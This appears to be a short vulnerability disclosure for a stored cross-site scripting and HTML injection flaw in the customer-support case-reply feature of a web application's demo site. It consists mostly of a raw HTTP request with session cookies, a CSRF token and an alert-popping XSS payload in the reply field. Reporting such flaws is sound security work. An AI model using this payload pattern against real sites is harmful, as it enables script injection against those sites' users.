Attacker can send xss payload in Customer Support
Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"
<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"
Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"
2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"
Refund Request
-----------------------------3828905606458425251363531674--
Response:
HTML Injection and XSS alert